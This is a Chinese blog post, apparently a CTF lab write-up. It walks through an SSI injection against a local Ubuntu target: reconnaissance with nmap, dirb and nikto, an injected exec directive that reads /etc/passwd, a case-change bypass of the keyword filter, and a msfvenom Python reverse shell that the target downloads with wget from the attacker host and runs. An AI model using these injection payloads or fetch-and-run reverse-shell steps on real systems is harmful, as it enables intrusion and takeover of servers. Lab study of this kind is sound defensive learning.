CTF-SSI注入

最新推荐文章于 2021-09-08 16:44:01 发布
最新推荐文章于 2021-09-08 16:44:01 发布
阅读量283 收藏
点赞数
分类专栏: CTF 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/su__xiaoyan/article/details/111667883
版权

SSI注入

SSI 注入全称Server-Side Includes Injection,即服务端包含注入。SSI 是类似于CGI,用于执行动态页面的指令。SSI 注入允许远程在 Web 应用中注入脚本来执行代码。
SSI是嵌入HTML页面中的指令,在页面被提供时由服务器进行运算,以对现有HTML页面增加动态生成的内容,而无须通过CGI程序提供其整个页面,或者使用其他动态技术。
从技术角度上来说,SSI就是在HTML文件中,可以通过注释行调用的命令或指针,即允许通过在HTML页面注入脚本或远程执行任意代码。
参考链接:https://blog.csdn.net/bylfsj/article/details/101451413

实验环境:

攻击者:Kali Linux(192.168.100.146)
靶机:VMware workstations Pro——Ubuntu 6(32-bit)(192.168.100.133)

实验流程:

  • 端口扫描,服务探测
    命令:nmap -sV 192.168.100.133
    开放了80端口,Web服务——Apache服务器
    在这里插入图片描述
  • 目录扫描
    命令:dirb http://192.168.100.133
    敏感目录:robots.txt文件、ssi目录等
    在这里插入图片描述
  • Web详细信息探测
    命令:nikto -host http://192.168.100.133
    发现了敏感文件:index.shtml
    在这里插入图片描述
  • 网站下面有Ssi目录,结合该网站目录下面的index.shtml,判断该网站可能使用了ssi技术。
    在这里插入图片描述
  • 网站下面的index中存放着SSI命令执行的关键字
    在这里插入图片描述
  • http://192.168.100.133/index.php中疑似有命令执行功能,通过上面的关键字构建要执行的命令。<-- #exec cmd=“cat /etc/passwd” -->
    在这里插入图片描述
  • 网站对用户输入的内容进行了过滤,Target输入框中对尖括号进行了过滤,Feedback输入框中对exec关键字进行了过滤。
    在这里插入图片描述在这里插入图片描述
  • 尖括号绕过方式有限,尝试绕过对于关键字exec的检测过滤,使用大小写的方式绕过。
    在这里插入图片描述在这里插入图片描述
  • 成功绕过防御,构造命令
    在这里插入图片描述在这里插入图片描述
  • 生成木马,上传到靶机root用户家目录
    利用msfvenom生成木马,利用python反弹shell
    在这里插入图片描述
  • 将生成的木马放在/var/www/html(httpd服务的网站主目录)下面
    在这里插入图片描述
  • 启动kali的httpd服务
    在这里插入图片描述
  • 靶机上面执行命令使用wget下载文件并执行。 wget http://192.168.100.146/shell.py
    在这里插入图片描述在这里插入图片描述在这里插入图片描述
  • 监听端口,反弹shell
    在这里插入图片描述在这里插入图片描述
  • 执行木马
    在这里插入图片描述
  • 反弹shell
    在这里插入图片描述
    在这里插入图片描述
  • 优化shell
    在这里插入图片描述
  • 获取权限
    在这里插入图片描述
采姑娘の小蘑菇
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CTF之Web安全SSI注入
小司机的奥拓
08-10 268
如何从外部进入主机?SSI(server side inject)的出现是为了赋予HTML静态页面动态的效果,通过SSI来执行系统命令;并返回对应的结果。如果再网站目录中发现了.stm;.shtm;.shtml;这样的文件后缀名,并且网站对于SSI的输入没有做到严格过滤或者过滤不充分;很有可能被SSI注入攻击。对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。
ssi注入详解
D1stiny的博客
05-22 1725
ssi是赋予html静态页面的动态效果,通过ssi执行命令,返回对应的结果,若在网站目录中发现了.stm .shtm .shtml等,且对应SSL输入没有过滤,可能存在SSI注入漏洞 简单的说ssi注入就是寻找输入点输入类似<!--#exec cmd="命令" --> 格式,看看能不能运行系统命令 首先netdiscover -r 你的ip/24扫描得到靶场IP 用nmap进行扫描 用dirb进行扫描 发现了ssi,意识到可能是ssi注入 访问一下http://192.168.199.1
SSI漏洞注入
weixin_45007073的博客
01-04 879
在进行SSI漏洞注入之前,先介绍一下什么是SSI漏洞。 SSI 注入全称Server-Side Includes Injection,即服务端包含注入SSI 是类似于 CGI,用于动态页面的指令。SSI 注入允许远程在 Web 应用中注入脚本来执行代码。 准备工作 靶机地址: 链接:https://pan.baidu.com/s/1MTunDny-m5eICXAS9P8ugA 提取码:x3c2 漏洞复现过程 使用netdiscover发现存活主机 netdidscover -i eth0 使用n
SSI注入漏洞
Hydra的博客
11-19 9264
SSI 注入全称Server-Side Includes Injection,即服务端包含注入SSI 是类似于 CGI,用于动态页面的指令。SSI 注入允许远程在 Web 应用中注入脚本来执行代码。 SSI是嵌入HTML页面中的指令,在页面被提供时由服务器进行运算,以对现有HTML页面增加动态生成的内容,而无须通过CGI程序提供其整个页面,或者使用其他动态技术。 从技术角度上来说,SSI就是...
CTF-misc工具2-CTF-Tools-masterV1.3.7
08-17
CTF-Tools-master是一个专注于密码编码识别与解码的工具,能自动推断密码的编码类型,并进行解码。 适用人群: 该工具主要适用于参加CTF竞赛的选手,以及对密码编码算法感兴趣的信息安全从业人员。 使用场景: 在CTF竞赛...
ctf-2017-release:BSidesSF CTF 2017版本
05-28
ctf-2017 2017 BSidesSF CTF面临的挑战 内置的 , , , , 在本地应对挑战 您可以使用docker在本地运行所有挑战。 docker-compose build && docker-compose up -d 挑战将在http://localhost:PORT提供,基于...
ctf-tools-linux-master.zip
06-22
ctf集成工具包-linux版
CTF-RSA-tool-master.zip
01-19
针对CTF中CRYPTO的RSA工具
CTF-Tools-v1.3.5
01-24
CTF-Tools-v1.3.5
服务器端包含注入SSI分析总结
3569
01-11 1446
参考文章  :https://www.secpulse.com/archives/66934.html 描述 SSI是用于向动态内容提供HTML页面的Web应用程序中存在的指令。 它们与CGI类似,不同之处在于SSI用于在加载当前页面之前执行某些操作,或者在页面可视化时执行某些操作。 为此,Web服务器在将页面提供给用户之前分析SSI。 服务器端包含攻击允许通过在HTML页面
CTF夺旗训练课程
taozijun的博客
09-04 1万+
第一章 课程介绍与环境搭建 1-2 环境搭建 攻击机统一为kali,直接用ova文件创建靶场机器后,靶场机器要求进行登陆。 可我们并没有用户名和密码。问题是:如果我们不进行登陆,如何获得靶场机器的ip地址?从而达到联通靶场机器的目的. 这里我们使用netdiscover命令 netdiscover -r ip/子网掩码    24为24位二进制数1,就是255.255.255.0。...
CTFSSI注入
afei001
02-03 405
SSI注入攻击介绍     SSI(server side inject)的出现是为了赋予html静态页面动态的效果,通过SSI注入漏洞来执行系统命令,并返回对应的结果。     如果在网站目录中发现了stm、shtm、shtml,并且网站对于ssi的输入没有做到严格过滤,很有可能被SSI注入攻击。 练习环境 攻击机:kali 靶机:Ubuntu 16.04.3 1. 发现靶机,并对端口进...
CTF-SSI注入攻击
Reaches_r的博客
08-06 460
前言:SSI介绍 SSl(server side inject)的出现是为了赋予html静态页面动态的效果,通过ssi来执行系统命令,并返回对应的结果。 如果在网站目录中发现了.stm, .shtm .shtml,并且网站对于ssi的输入没有做到严格过滤,很有可能被ssl注入攻击。 1.用dirb和nikto扫描,收集有用信息。很明显可以判断有ssi漏洞 2.看看这个index文件,是一个命令行,这时开始寻找注入点 3.发现首页有个可以输入的地方,feedback(反馈)肯定是个注入点..
CTF实验:SSI注入
floyd_art的博客
04-04 482
SSI注入攻击介绍 SSI(server side inject)的出现是为了赋予html静态页面动态的效果,通过SSI来执行系统命令,并返回对应的结果。     如果在网站目录中发现了 .stm, .shtm .shtml,并且网站对于SSL的输入没有做到严格过滤,很有可能被SSI注入攻击。 信息探测 扫描主机服务信息以及服务版本 – nmap -sV 靶场IP地址 快速扫描主机全部信息 –...
SSTI (服务器模板注入)
热门推荐
Hydra的博客
11-02 2万+
 先来一波flask ssti漏洞的代码。 #python3 #Flask version:0.12.2 #Jinja2: 2.10 from flask import Flask, request from jinja2 import Template app = Flask(__name__) @app.route("/") def index(): name = request....
CTF实战(二):SSI注入
mcc的博客
09-09 405
SSI注入 这是少数几个比较完整的靶机,因此就写一篇博客记录一下拿shell的过程 1.主机发现 nmap -sP 10.10.3.0/24 2.服务扫描 nmap -sV 10.10.3.104 nmap -T4 -A -v 10.10.3.104 3.目录扫描 dirb 10.10.3.104 nikto -h 10.10.3.104 4.zap扫描 这个好无聊,扫出了漏洞 5.SSI注入...
SSI注入 + [BJDCTF2020]EasySearch writeup
ShenZ的博客
09-08 255
SSI注入 全称Server-Side Includes Injection,即服务端包含注入SSI 是类似于 CGI,用于动态页面的指令。SSI 注入允许远程在 Web 应用中注入脚本来执行代码。 页面中有一小部分是动态输出的时候使用SSI,比如: 文件相关的属性字段 当前时间 访客IP 调用CGI程序 SSI语法 SHTML文件中使用SSI指令引用其他的html文件(#include),此时服务器会将SHTML中包含的SSI指令解释,再传送给客户端,此时的HTML中就不再有SSI指令了。 ①显示
web中各种命令注入的检测和利用一
煜铭2011
09-03 8737
0x00 前言          我们都知道在web 中有着各种数据注入攻击,其中有SQL注入、命令注入、XML注入等等。在平时我们渗透测试的任务中,如何快速检测和利用这些注入的漏洞,以下是一些注入命令总结 0x01 SQL 注入 1.1 通用的 SQL 注入攻击字符 查询中断语法    :           单引号(‘),      双引号(“) 注入SQL注释    :
ctf-qsnctf此地无银三百
最新发布
02-20
ctf-qsnctf是一个CTF(Capture The Flag)比赛平台,它提供了一系列的网络安全挑战,旨在帮助参与者提升网络安全技能和解决问题的能力。在ctf-qsnctf平台上,参与者可以通过解决各种类型的题目来获取旗帜(flag),...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值